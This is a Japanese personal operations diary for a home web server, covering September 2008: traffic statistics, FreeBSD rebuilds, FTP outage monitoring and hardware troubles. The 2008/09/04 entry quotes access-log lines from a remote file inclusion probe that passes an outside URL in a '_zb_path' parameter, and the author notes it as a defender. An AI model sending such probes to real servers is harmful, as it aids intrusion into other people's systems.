自宅通信網の運用日誌2008年09月


お知らせ

 今後リンク切れが発生しにくくするためと、多くの項目が一つのページに集中することにより検索サイトを使った検索結果が適切で無くなることを防止するために、「自宅通信網の運用日誌」の構造を変更しました。

 月ごとに分離していますので、お手数ですが最新月以外は当該月のリンクを使って閲覧してください。


目次


09月

目次へ戻る トップへ戻る

2008/09/01 Mon

日誌の切り替え

 先月(8月)は月間ページリクエスト数(8304⇒11562)、週間ページリクエスト数(2824⇒3381)、1日のページリクエスト数(770⇒1181)、それぞれを更新した。長期の休みのある月はリクエスト数が低迷する傾向があったのでこれは新しい傾向だった。

 1ヶ月のアクセス数を見ることが出来るログ解析結果(当月計)で見ると土日などの休日のアクセス数が増えるようになった。今までは平日の方がアクセスが多かったのでまるで傾向が逆転している。見てもらえる人に変化があったようだ。

 今月は反動で少なくなりそうな予感。


2008/09/04 Thu

怪しげなアクセス

 当公開WEBサーバに対してPHPの脆弱性を狙った感じでない、怪しげなアクセスが行われた。

xxx.xxx.xxx.39 - - [04/Sep/2008:03:32:05 +0900] "GET /log//?_zb_path=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 1967 "-" "libwww-perl/5.803"
xxx.xxx.xxx.39 - - [04/Sep/2008:03:32:05 +0900] "GET //?_zb_path=http://manu

 トップページと/log/に対してIPアドレスを変えて計13セット、変なGETが行われている。多分後半に書かれている、変なサイトに対してgifファイルを取得してしまうと、脆弱性有りとして判断されて本格的な踏み台行為が行われるのでしょう。

 ステータスが200で正常終了しているので慌てたが、結局、当公開WEBサーバのトップページと/log/index.htmlを送り出しただけだっようでほっと一安心。

 しかし、大丈夫かな。

FreeBSDをアップデート

 当公開サーバのOSでもあるFreeBSDを使ったPC群のアップデートをしばらくしていなかったので本日アップデート。

FreeBSD is a registered trademark of The FreeBSD Foundation.
FreeBSD 6.4-PRERELEASE #69: Thu Sep  4 21:44:03 JST 2008

 6.3でなく6.4-PRERELEASEになっている。6.3が6系の最終版になる物だとばかり思っていた。予定外のマイナーバージョンアップが行われるようだ。


2008/09/09 Tue

FreeBSDをアップデート

 NTP関係に大量に変更があったようなのでアップデート。カーネルの表示は2008/9/4の物と変化はなかったと見間違えたが以前のブート表示が残っていただけだった。実際には以下のようにアップデート。

FreeBSD is a registered trademark of The FreeBSD Foundation.
FreeBSD 6.4-PRERELEASE #71: Tue Sep  9 21:53:45 JST 2008

 ntpdのバージョン表示は以下の通りに変わった。

ntpq 4.2.4p5-a Tue Sep  9 21:41:18 JST 2008 (1)

2008/09/10 Wed

FreeBSDを再度アップデート

 Core2 Duoへの最適化向上を意図してコンパイルオプション(make.conf)のCPUTYPEをprescottに変更して再度OSをアップデート。まずは、自宅内プロキシで致命的な異常が出ないのを確認してから当公開Webサーバにて実施。

/etc/make.conf
  CPUTYPE?=pentium4m ⇒ CPUTYPE?=prescott
dmesg
  FreeBSD is a registered trademark of The FreeBSD Foundation.
  FreeBSD 6.4-PRERELEASE #72: Wed Sep 10 21:54:20 JST 2008

 実施後にカーネルのリコンパイル時間を計ると、6分27秒16。cpufreq や powerd のが有効の状態では速くなってもいないが遅くもなっていないという感じ。

 その後level 0 dumpを実施しようとして、間違えてlevel1 dumpに使っているDVD-RAMに上書きしてしまった。

 コピーアンドペーストしてコマンドラインエディタで編集しようとして、改行までコピーしてしまい実行してしまった。ちゃんとバッチを書いておかなくちゃと反省。


2008/09/13 Sat

WIDE(奈良)の公開ftpサーバが再び長時間停止

 関西方面のインターネット上の状況確認に使わせてもらっているWIDE(奈良)の公開ftpサーバの通信が昨日(2008/09/12 Fri)昼(12:00)から夜(19:05)にかけて途絶。今回も通信状況から考えてWIDE(奈良)の公開ftpサーバが止まったかその近辺の通信網の異常のように思う。

20080913のWIDE(奈良)の停止
WIDE(奈良)の公開ftpサーバへの通信は途絶している。
20080913のIIJのFTPの停止
関東方面は途絶はなし。

 通信途絶の他に、本日(2008/09/13 Sat)01時頃から02時頃までに関西/関東方面共に通信遅延が不自然に増加している。ほぼ同じ時間なので、これは当公開サーバのブロバイダであるつなぐネット側の遅延増加だと思う。

 難にしてもインターネットの不安定な挙動が目立ってきているいるように思う。

有名サイトへの掲載を確認

 価格.comのWD10EACS (1TB SATA300) クチコミのページに2008/09/11 Thu 22時頃に掲載されたよう。

 大手有名サイトの掲載であったのに閲覧数にはあまり変化がなくログの解析を見ると参照元レポートに2桁の数で現れていた。アクセス解析で気がついたのとほぼ同じ時期にGoogleの検索にも出るようになった。「WDC Caviar GPのディスク回転速度どうなっているのか」と「WD10EACS-00D6B0のディスク回転速度はどうなっているのか」が5400rpm固定回転速度の論拠のソースとしてあげられているが、そこまで確認する人は多くないようだ。

 また、Yahoo!知恵袋のパソコン、周辺機器のページにも本日16時頃「WD10EACS-00D6B0のディスク回転速度はどうなっているのか」が掲載されたよう。これもほとんど増加しなかったので解析をよく見るまで気づかなかった。


2008/09/14 Sun

WIDE(奈良)の公開ftpサーバが再び長時間停止

 関西方面のインターネット上の状況確認に使わせてもらっているWIDE(奈良)の公開ftpサーバの通信が本日(2008/09/14 Sun)朝(08:450)から今現在(22:48)も途絶中。今回も通信状況から考えてWIDE(奈良)の公開ftpサーバが止まったかその近辺の通信網の異常のように思う。

20080914のWIDE(奈良)の停止
WIDE(奈良)の公開ftpサーバへの通信は途絶している。
20080915のIIJのFTPの停止
関東方面は途絶はなし。

 通信途絶の他に、全体に通信遅延が増加している。インターネットがパンクしかかっているのだろうか。

工人舎のSC3KP06GAを買ったが初期化に失敗

 外出先からのアクセス手段を増やそうと一昨日(2008/09/12 Fri)工人舎のUltra Mobile PC SC3KP06GAを購入し、セットアップしてリブートしたところ設定したつもりのパスワードでログイン出来なくなってしまった。工場出荷状態に戻そうとリカバリを試みたが説明書のリカバリ方法でもパスワードを聞かれてしまうでリカバリできず。

  1. クイックセットアップガイドを見てセットアップ
  2. イーサネットケーブルを接続
  3. ローカル通信網の設定
  4. http プロキシを設定する
  5. Windows のファイヤウォールにプロキシのポートを設定
  6. Windows Updateを実施(26項目検出)
  7. 再起動を促すメッセージが出たため再起動
  8. 再起動後にログイン画面でログインできず
  9. さらに再起動して[F8]キーを押しリカバリ手順を試してもパスワードが合わず出来ず

 多分、セットアップ時にパスワードを入れ間違えていると思う。複数思い当たるパスワードを試が合わなかった。また、パスワードをリセットのためのUSBキーなども作成していなかった。見事に失敗してしまった。

 昨日(2008/09/13 Sat)午後に工人舎のサポートにFAXで依頼をかけたが現在の所は回答なし。営業日に対応かな。

先週はセキュリティアップデートが2つあった

 先週は、水曜日(2008/09/10 Wed)に定例のWindowsのセキュリティアップデートの他にJUSTSYSTEMのジャストスイートのセキュリティアップデートもあった。攻撃対象が無差別になってきているなぁ。


2008/09/15 Mon

メインPCのグラフィックボードの故障

 メインPCグラフィックボードであるNVIDIA Quadro NVS 440 (ELSA)が故障。プライマリで使ってた方の出力が出なくなってしまった。

 このため急遽、試しに使ってみるために買ってあった、ATI RADEON HD3850PRO-E512HW(玄人志向)とATI RADEON HD3650 256M(SAPPER)のDualグラフィックカード体制に移行。このシリーズアイドル時の消費電力が少なとのことなので電源の負担が比較的なく

 HD3850PROの方はPCI-Express x16のスロット、HD3650はPCI-Express x4の方にさしてインストール。HD3850PROは2スロット使ってしまうので、PCI-Express x16の隣のPCIスロットにさしてあったサウンドカードのWAVIO SE-200PCI2(ONKYO)を取り除いてマザーボード上のサウンド機構に切り替えるなど大事になった。しかし、インストールすると一応無事画面がでる。

 しかし、グラフィックカード付属のドライバでは、画面の回転の設定が巧く動かないとか、メーカサイトのドライバだけではビデオが再生巧くできないなどのトラブルがあって結構安定させるのに手間取った。結局両カードに付属のドライバを共にインストールしたあとメーカサイトのドライバでアップデートしら巧く行った。

 これ以外にも、NVIDIAのユーティリティがカードを際していないとアンインストールできなくて、別のユーティリティを使って無効化するなど結構手間取って本日一日かかってしまった。

 3D描画能力は大幅に向上したが、当サイトに関係ある2D関係能力は低下。

CrystalMark 2004R2 [0.9.123.338]
NX7950 GTNVS 440HD3850PRO
GDI13753106497814
D2D1044735802780
OGL305791527847261

 しかしこのベンチマークより、しゃきしゃき動く印象。なぜかな?ビデオ関係の能力はかなり高い感じ。消費電量はピークが100W程度増えてしまった。


2008/09/16 Tue

ClystalDiskMark2.1系に問題

 当サイトでベンチマークに使っている、CrystalDiskMark2.1系列についてテストサイズを 500/1000MB に設定した場合に Random Read/Write 4KB テストにて前半の 134MB しか使用しないという重大な不具合が報告されてしまった。3回目。

 どうしたものかなぁ? 2.0から2.1への経緯もあるし、しばらく様子見かな・・・・SiI3124とポートマルチプライヤによるRAIDの構成例にはこの問題を追記して明記。

ページリクエスト数が急増

 本日14時前後から18時くらいまでの間、ページリクエスト数が急増。ピークは16時少し前くらい。15時から16時の間のリクエスト数は58ページリクエストに達した。

 しかし、この原因が謎。参照元の部分がないログが多いので某有名巨大匿名掲示板に取り上げてもらった可能性が高い。確かに自作PC板のHGSTのスレッドや、SATA RAIDカードのスレッド、WesternDigitalのスレッドのテンプレートの再掲載などに取り上げてもらっていたが、時間が合わないし、前から取り上げてもらっていて既出なのであまりアクセス数が増えないようだ。

 いったいどこに掲載してもらったのだろう。


2008/09/22 Mon

ページリクエスト数が急増

 本日19時前後から24時くらいまでの間、ページリクエスト数が急増。ピークは22時過ぎくらい。22時台のクエスト数は136ページリクエストに達した。

 今回は原因が判明。某有名巨大匿名掲示板の自作PC板のHGSTのスレッドで「WDC Caviar GPのディスク回転速度どうなっているのか」と「メインクライアント詳細」を取り上げてもらっていた。

 WDC Caviar GPのディスク回転速度どうなっているのか」の方は取り上げてもらえる定番となってきているが「メインクライアント詳細」の方を話題にしてもらえるのは珍しい。


2008/09/25 Thu

メインPCソフトのアップデートを実施

Mixi で取り上げてもらっているようだけど?

 Mixiで利用しているHDDの概略で取り上げてもらっているようではあるが、どんなないようで取り上げられているんだろう。


2008年10月へ

目次へ戻る トップへ戻る